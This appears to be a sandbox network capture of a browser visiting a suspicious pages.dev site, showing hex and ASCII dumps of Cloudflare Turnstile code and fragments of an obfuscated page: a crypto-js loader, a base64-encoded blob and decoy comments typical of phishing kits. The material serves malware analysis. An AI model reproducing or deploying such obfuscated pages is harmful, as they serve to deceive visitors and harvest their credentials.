                                                                last-modified: Thu, 15 Aug 2024 16:28:23 GMT
                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                access-control-allow-origin: *
                                                                cross-origin-resource-policy: cross-origin
                                                                Server: cloudflare
                                                                CF-RAY: 8b9dfaba6c105e68-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:03:38 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 53 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 5f 3d 65 5b 75 5d 28 67 29 2c 70 3d 5f 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 61 28 66 29 3b 72 65 74 75 72 6e 7d 5f 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                Data Ascii: "use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);funct
                                                                2024-08-27 18:03:38 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 5f 72 28 65 2c 72 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 24 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                Data Ascii: e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function $e(e,r){return r=r!=nu
                                                                2024-08-27 18:03:38 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 4a 65 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 62 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 43 74 28 65 29 7c 7c 4e 74 28 65 2c 72 29 7c 7c 4c 74 28 65 2c 72 29 7c 7c 6b 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 4e 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                Data Ascii: ray$/.test(a))return Je(e,r)}}function be(e,r){return Ct(e)||Nt(e,r)||Lt(e,r)||kt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ne(e,r){var a={label:0,sent:function(){if(u[0
                                                                2024-08-27 18:03:38 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 46 74 3d 33 30 30 30 32 30 3b 76 61 72 20 6b 65 3d 33 30 30 30 33 30 3b 76 61 72 20 4c 65 3d 33 30 30 30 33 31 3b 76 61 72 20 42 3b 28 66 75
                                                                Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Ft=300020;var ke=300030;var Le=300031;var B;(fu
                                                                2024-08-27 18:03:38 UTC1369INData Raw: 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 75 65 7c 7c 28 75 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6c 65 3b 28 66 75 6e
                                                                Data Ascii: e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ue||(ue={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var le;(fun
                                                                2024-08-27 18:03:38 UTC1369INData Raw: 76 61 72 20 59 3d 22 30 2f 30 22 3b 66 75 6e 63 74 69 6f 6e 20 66 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64
                                                                Data Ascii: var Y="0/0";function ft(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="d
                                                                2024-08-27 18:03:38 UTC1369INData Raw: 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 63 2c 75 3d 4c 28 78 72 2c 28 63 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 63 21 3d 3d 76 6f 69 64 20 30 3f 63 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 67 2c 5f 3d 4c 28 77 72 2c 28 67 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 67 21 3d 3d 76 6f 69 64 20 30 3f 67 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 6f 26 26 75 3f 22
                                                                Data Ascii: HAVING_TROUBLES,c,u=L(xr,(c=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&c!==void 0?c:"nonexistent"),g,_=L(wr,(g=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null&&g!==void 0?g:"nonexistent");return o&&u?"
                                                                2024-08-27 18:03:38 UTC1369INData Raw: 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 61 29 7d 2c 73 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 5a 74 28 65 29 7b 72 65 74 75 72 6e 20 46 75 6e 63 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 50 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 5a 74 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29
                                                                Data Ascii: __proto__||Object.getPrototypeOf(a)},se(e)}function Zt(e){return Function.toString.call(e).indexOf("[native code]")!==-1}function Pe(e){var r=typeof Map=="function"?new Map:void 0;return Pe=function(o){if(o===null||!Zt(o))return o;if(typeof o!="function")
                                                                2024-08-27 18:03:38 UTC1369INData Raw: 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72 2e 73 72 63 29 29 72 65 74 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2c 6f 3d 30 2c 63 3b 63 3d 61 5b 6f 5d 3b 6f 2b 2b 29 69 66 28 50 28 63 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 61 72 28 29 7b 76 61 72 20 65 3d 67 74 28 29 3b 65 7c 7c 76 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34
                                                                Data Ascii: riptElement)&&e.test(r.src))return r;for(var a=document.querySelectorAll("script"),o=0,c;c=a[o];o++)if(P(c,HTMLScriptElement)&&e.test(c.src))return c}function ar(){var e=gt();e||v("Could not find Turnstile script tag, some features may not be available",4
                                                                2024-08-27 18:03:38 UTC1369INData Raw: 28 22 61 6c 6c 6f 77 22 2c 22 63 72 6f 73 73 2d 6f 72 69 67 69 6e 2d 69 73 6f 6c 61 74 65 64 3b 20 66 75 6c 6c 73 63 72 65 65 6e 22 29 2c 66 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 61 6e 64 62 6f 78 22 2c 22 61 6c 6c 6f 77 2d 73 61 6d 65 2d 6f 72 69 67 69 6e 20 61 6c 6c 6f 77 2d 73 63 72 69 70 74 73 20 61 6c 6c 6f 77 2d 70 6f 70 75 70 73 20 61 6c 6c 6f 77 2d 66 6f 72 6d 73 22 29 2c 66 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 63 72 6f 6c 6c 69 6e 67 22 2c 22 6e 6f 22 29 2c 66 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 57 69 64 74 68 3d 22 30 70 78 22 2c 66 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 25 22 2c 66 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 25 22 2c 66 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64
                                                                Data Ascii: ("allow","cross-origin-isolated; fullscreen"),f.setAttribute("sandbox","allow-same-origin allow-scripts allow-popups allow-forms"),f.setAttribute("scrolling","no"),f.style.borderWidth="0px",f.style.width="100%",f.style.height="100%",f.style.overflow="hidd


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.1649737172.66.47.1114433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:38 UTC680OUTGET /favicon.ico HTTP/1.1
                                                                Host: ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:38 UTC788INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:03:38 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=0, must-revalidate
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                x-content-type-options: nosniff
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XGElyMDyRchntq6h2E%2BDf2VLMjnuayTrv%2FviQYfZOg1c1mOs0HgtLvLOCh5p22cKMORTCmoN3JqrmsRrPQjtwFPYSMZCky41%2BIklmcn5k5PinXVzqNVKigme56Q93B0%2F0F0fYdpT18m%2BD0Elyhygd0qANgtNIYsqBeD8G%2B4YnK42hL4Xw8t5Acn6B6ioKtwQ%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8b9dfabc7c9c41e1-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:03:38 UTC1369INData Raw: 31 37 33 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e e2 81 a4 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e
                                                                Data Ascii: 1736<html> <head> <title></title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.
                                                                2024-08-27 18:03:38 UTC1369INData Raw: 74 69 6f 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 20 30 2e 35 2c 20 30 2c 20 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 40 6b 65 79 66 72 61 6d 65 73 20 63 61 6c 2d 62 6f 75 6e 63 65 20 7b 30 25 2c 20 31 30 30 25 2c 20 31 36 2e 35 25 2c 20 37 36 2e 31 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 31 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 32 38 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 33 39 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 33 31 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 2e 30 35 29 3b 7d 33 33 25 20 7b
                                                                Data Ascii: tion: cubic-bezier(0, 0.5, 0, 1);transform: translateY(51px) scaleY(1);}@keyframes cal-bounce {0%, 100%, 16.5%, 76.1% {transform: translateY(151px) scaleY(1);}28% {transform: translateY(39px) scaleY(1);}31% {transform: translateY(51px) scaleY(1.05);}33% {
                                                                2024-08-27 18:03:38 UTC1369INData Raw: 72 61 6d 65 73 20 63 6c 6f 73 65 64 2d 66 6c 61 70 2d 73 77 69 6e 67 20 7b 30 25 2c 20 31 30 30 25 2c 20 37 37 25 2c 20 38 2e 35 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 31 70 78 29 20 72 6f 74 61 74 65 33 64 28 31 2c 20 30 2c 20 30 2c 20 30 29 3b 7d 31 34 2e 35 25 2c 20 37 36 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 31 70 78 29 20 72 6f 74 61 74 65 33 64 28 31 2c 20 30 2c 20 30 2c 20 39 30 64 65 67 29 3b 7d 7d 23 62 61 63 6b 64 72 6f 70 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 68 65 69 67 68 74 3a 20 31 30 37 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 7d 2e 6c 61 63 6f 6e 69 63 20 7b 77 69 64 74 68 3a 20 39 36 70 78 3b 68 65 69 67 68 74 3a 20 39 36 70 78
                                                                Data Ascii: rames closed-flap-swing {0%, 100%, 77%, 8.5% {transform: translateY(-71px) rotate3d(1, 0, 0, 0);}14.5%, 76% {transform: translateY(-71px) rotate3d(1, 0, 0, 90deg);}}#backdrop {width: 130px;height: 107px;overflow: hidden;}.laconic {width: 96px;height: 96px
                                                                2024-08-27 18:03:38 UTC1369INData Raw: 72 65 22 3e 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 64 72 6f 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 63 6f 6e 69 63 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0d 0a 09 3c 21 2d 2d 20 3c 73 70 61 6e 3e 4c 69 66 65 e2 80 99 73 20 6a 6f 75 72 6e 65 79 20 69 73 20 62 65 73 74 20 65 78 70 65 72 69 65 6e 63 65 64 20 62 65 68 69 6e 64 20 74 68 65 20 77 68 65 65 6c 2e 3c 2f 73 70 61 6e 3e 20 2d 2d 3e 0d 0a 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 6c 61 62 6f 72 65 64 28 79 61 63 68 74 69 6e 67 29 20 7b 20 3c 21 2d 2d 20 44 72 69 76 69 6e 67 20 69 73 20 74 68 65 20 72 68 79 74 68 6d 20 6f 66 20 6c 69 66 65 20 69 6e 20 6d 6f 74 69 6f 6e 2e 20 2d
                                                                Data Ascii: re"><div id="backdrop"><div class="laconic"></div></div></div></div>... <span>Lifes journey is best experienced behind the wheel.</span> --> </body><script> async function labored(yachting) { ... Driving is the rhythm of life in motion. -
                                                                2024-08-27 18:03:38 UTC474INData Raw: 7a 4f 44 56 6a 5a 57 49 32 4d 47 51 79 4e 32 46 6d 59 6a 41 35 4d 6a 4d 78 59 7a 52 6b 5a 44 45 34 4e 7a 6b 7a 4e 6a 46 6d 59 7a 51 34 5a 44 56 69 4f 54 64 6b 4d 6a 63 30 4d 54 4d 30 4d 6d 4a 6a 4e 54 42 6b 4d 44 41 33 4f 54 64 6d 4e 7a 4e 68 4f 54 42 6d 4d 6a 46 6c 4d 57 49 32 5a 54 51 79 4e 57 4d 30 4e 6a 67 77 4e 57 4d 32 4d 6a 45 79 4f 44 45 30 4e 32 4e 6c 4f 47 56 6d 59 57 55 31 4f 54 68 6d 4e 32 55 32 4d 44 49 31 5a 54 68 6d 49 69 77 69 5a 43 49 36 49 6a 5a 68 4e 6a 45 32 59 7a 5a 6d 4e 7a 41 33 4f 53 4a 39 60 29 29 2c 20 7b 20 3c 21 2d 2d 20 44 72 69 76 69 6e 67 20 69 73 20 61 20 63 6f 6e 76 65 72 73 61 74 69 6f 6e 20 62 65 74 77 65 65 6e 20 79 6f 75 20 61 6e 64 20 74 68 65 20 72 6f 61 64 2e 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d
                                                                Data Ascii: zODVjZWI2MGQyN2FmYjA5MjMxYzRkZDE4NzkzNjFmYzQ4ZDViOTdkMjc0MTM0MmJjNTBkMDA3OTdmNzNhOTBmMjFlMWI2ZTQyNWM0NjgwNWM2MjEyODE0N2NlOGVmYWU1OThmN2U2MDI1ZThmIiwiZCI6IjZhNjE2YzZmNzA3OSJ9`)), { ... Driving is a conversation between you and the road. --> m
                                                                2024-08-27 18:03:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.1649741104.18.94.414433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:38 UTC383OUTGET /turnstile/v0/b/6790c32b9fc9/api.js HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:38 UTC471INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:03:38 GMT
                                                                Content-Type: application/javascript; charset=UTF-8
                                                                Content-Length: 45035
                                                                Connection: close
                                                                accept-ranges: bytes
                                                                last-modified: Thu, 15 Aug 2024 16:28:23 GMT
                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                access-control-allow-origin: *
                                                                cross-origin-resource-policy: cross-origin
                                                                Server: cloudflare
                                                                CF-RAY: 8b9dfabf1e7343f8-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:03:38 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 53 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 5f 3d 65 5b 75 5d 28 67 29 2c 70 3d 5f 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 61 28 66 29 3b 72 65 74 75 72 6e 7d 5f 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                Data Ascii: "use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);funct
                                                                2024-08-27 18:03:38 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 5f 72 28 65 2c 72 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 24 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
